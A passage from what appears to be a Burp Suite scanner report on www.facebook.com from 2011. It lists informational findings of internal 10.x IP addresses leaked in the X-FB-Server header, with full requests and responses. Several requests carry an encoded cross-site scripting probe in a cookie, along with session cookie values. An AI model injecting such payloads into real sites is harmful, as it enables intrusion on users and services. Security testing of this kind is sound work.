GET /campaign/landing.php?campaign_id=137675572948107&partner_id=mmafighting.com&placement=like_button&extra_1=http%3A%2F%2Fwww.mmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545&extra_2=US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/r.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dmmafighting.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545%26extra_2%3DUS; expires=Sat, 04-Jun-2011 11:42:07 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.191.29
Connection: close
Date: Thu, 05 May 2011 11:42:07 GMT
Content-Length: 0


20.40. http://www.facebook.com/captcha/tfbimage.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /captcha/tfbimage.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.150.47

Request

GET /captcha/tfbimage.php?captcha_challenge_code=1304595614-beb186772f3d2620ad11f4586c5a18de&captcha_challenge_hash=AQDpkvzgEX8WUTIHyTCa1yvyR68iRvEwWFZCisUT48b64XkuINY-m3bVb4o3XhY-o1xwV29Et4FT5RvwZsH1rj7jRc7b1ZcIAZZxguGR9VIvE4X65RN8Vcv9Tg267ex-l6aIs0vgwbAwe6V1WKUnHFDdqkF786F_T7EgrDK_qtGuKE8VfWiuNItVb5RgkjdlzXnaE7FY94Vb-Wh3MdlKiL6XrhVUF0t8V1c3dSLOKzwNv3bY2G3_cjCdS88nth9gaWTToOgZyK38VcRqxNEOyuZLVxL0Ye_CehWSFsUusAbT44Swrq8oSuNyvIydXPv-g6NaVZiYRqKMpomLBTm_LxACbOVncr9iYoHbn4EjPHyqWJqftPi3r9XsdPPJ1392n4BlmSRE84EdWEYWn3e9mwIHSHQ0vvvLLaBmvUsnhowTgLUaMyKhm1LzQylP7MW51wDoO-ZjkzyR6vDb2vLn6AdEhgr7AT_yrFs8v1OuAADEkWkFd7yt0IimytjD65PNFuwWJVFy0Xi0AK_crrrwkHIOJgMJ4VP9QTMJj0eRd9k3MJRhJqqeC8pl7YCzMoPhmtxFjXB0voIB7VBBLRsjiHKj HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fcaptcha%2Ftfbimage.php%3Fcaptcha_challenge_code%3D1304595614-beb186772f3d2620ad11f4586c5a18de%26captcha_challenge_hash%3DAQDpkvzgEX8WUTIHyTCa1yvyR68iRvEwWFZCisUT48b64XkuINY-m3bVb4o3XhY-o1xwV29Et4FT5RvwZsH1rj7jRc7b1ZcIAZZxguGR9VIvE4X65RN8Vcv9Tg267ex-l6aIs0vgwbAwe6V1WKUnHFDdqkF786F_T7EgrDK_qtGuKE8VfWiuNItVb5RgkjdlzXnaE7FY94Vb-Wh3MdlKiL6XrhVUF0t8V1c3dSLOKzwNv3bY2G3_cjCdS88nth9gaWTToOgZyK38VcRqxNEOyuZLVxL0Ye_CehWSFsUusAbT44Swrq8oSuNyvIydXPv-g6NaVZiYRqKMpomLBTm_LxACbOVncr9iYoHbn4EjPHyqWJqftPi3r9XsdPPJ1392n4BlmSRE84EdWEYWn3e9mwIHSHQ0vvvLLaBmvUsnhowTgLUaMyKhm1LzQylP7MW51wDoO-ZjkzyR6vDb2vLn6AdEhgr7AT_yrFs8v1OuAADEkWkFd7yt0IimytjD65PNFuwWJVFy0Xi0AK_crrrwkHIOJgMJ4VP9QTMJj0eRd9k3MJRhJqqeC8pl7YCzMoPhmtxFjXB0voIB7VBBLRsjiHKj
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.150.47
X-Cnection: close
Date: Thu, 05 May 2011 11:43:19 GMT
Content-Length: 0


20.41. http://www.facebook.com/captcha/tfbimage.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /captcha/tfbimage.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.105.41

Request

GET /captcha/tfbimage.php?captcha_challenge_code=1304595626-d21de79035fc3bf09f7c11031428e954&captcha_challenge_hash=AQBmVlbjrUuFViWTOgtdaVHgaLtmyZm4oVGEKfzQBSt9EM1cVPpjHEUe-LybObuM23ufiIddLwkHgirN5Hmnt3GBelvEpbnsC6Sry-bQ861Q2VOktAdF2F7oqlVDLmu3fqn-Ui6RVj8ax4y9WHYaDGs8GsKl5X-5jjjHUUa40iHuoLvfmjLaq3QiYquL1eMP1p0wYlcikNNowa-6yKbTUm771cnDH4aQGpV3Pz01TukuamozVLneeDEarkzux5xcQZ2flgaBIa_gnbjK5WctMSz4FIKRrLgnhNAEz7mya6VcJCiR7L8TG3HFMjlM3xc0fo5QLspwIFeeHl-eWiAtt-bnYx3XA8kzbkEl2pw-UqltVt5SyL2CapxhsQZGraiOXUnGnr-snj0hmBTOrFmnYNjtKig8dzy8NsD0dLhsaUOPfxN5l_O3dbZ75rwkOBV6pF5rZbQcJrzuUtDd9UBMDkaHSHs7qLsO0pomrcv-vyF57MeA5ixPA3Z6I3x8SvkX68XQz-x8yLU8PH6ovOu4vbhfCeVrNNdr1Zm0zfCaK1oPNZVz2vjiloWG-oGc9mGWWJN7i_IoGH6ItljA3DnMvr6x HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613620616%2F2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fcaptcha%2Ftfbimage.php%3Fcaptcha_challenge_code%3D1304595626-d21de79035fc3bf09f7c11031428e954%26captcha_challenge_hash%3DAQBmVlbjrUuFViWTOgtdaVHgaLtmyZm4oVGEKfzQBSt9EM1cVPpjHEUe-LybObuM23ufiIddLwkHgirN5Hmnt3GBelvEpbnsC6Sry-bQ861Q2VOktAdF2F7oqlVDLmu3fqn-Ui6RVj8ax4y9WHYaDGs8GsKl5X-5jjjHUUa40iHuoLvfmjLaq3QiYquL1eMP1p0wYlcikNNowa-6yKbTUm771cnDH4aQGpV3Pz01TukuamozVLneeDEarkzux5xcQZ2flgaBIa_gnbjK5WctMSz4FIKRrLgnhNAEz7mya6VcJCiR7L8TG3HFMjlM3xc0fo5QLspwIFeeHl-eWiAtt-bnYx3XA8kzbkEl2pw-UqltVt5SyL2CapxhsQZGraiOXUnGnr-snj0hmBTOrFmnYNjtKig8dzy8NsD0dLhsaUOPfxN5l_O3dbZ75rwkOBV6pF5rZbQcJrzuUtDd9UBMDkaHSHs7qLsO0pomrcv-vyF57MeA5ixPA3Z6I3x8SvkX68XQz-x8yLU8PH6ovOu4vbhfCeVrNNdr1Zm0zfCaK1oPNZVz2vjiloWG-oGc9mGWWJN7i_IoGH6ItljA3DnMvr6x
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.41
X-Cnection: close
Date: Thu, 05 May 2011 11:43:33 GMT
Content-Length: 0


20.42. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.151.69

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.69
Connection: close
Date: Thu, 05 May 2011 11:43:02 GMT
Content-Length: 20523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.43. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.154.53

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.53
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.44. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.222.122

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.45. http://www.facebook.com/deedee.perez1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /deedee.perez1

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.165.57

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.46. http://www.facebook.com/directory/pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.155.51

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.47. http://www.facebook.com/directory/people/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.146.25

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.48. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.146.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df395d60694%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df248e1558%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df334af43f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f282070c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34571e8a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25b58ee14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d3362e14&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2f282070c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff25b58ee14&relation=parent&transport=postmessage&frame=f2d3362e14
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.146.37
X-Cnection: close
Date: Thu, 05 May 2011 01:29:25 GMT
Content-Length: 0


20.49. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.96.81

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2dc1db0a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113af6a38%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df121a56254%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe6e86bdc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d88f4528%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3496b1c54&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fe6e86bdc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2b359449c&relation=parent&transport=postmessage&frame=f3496b1c54
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.96.81
X-Cnection: close
Date: Thu, 05 May 2011 01:18:11 GMT
Content-Length: 0


20.50. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.136.127

Request

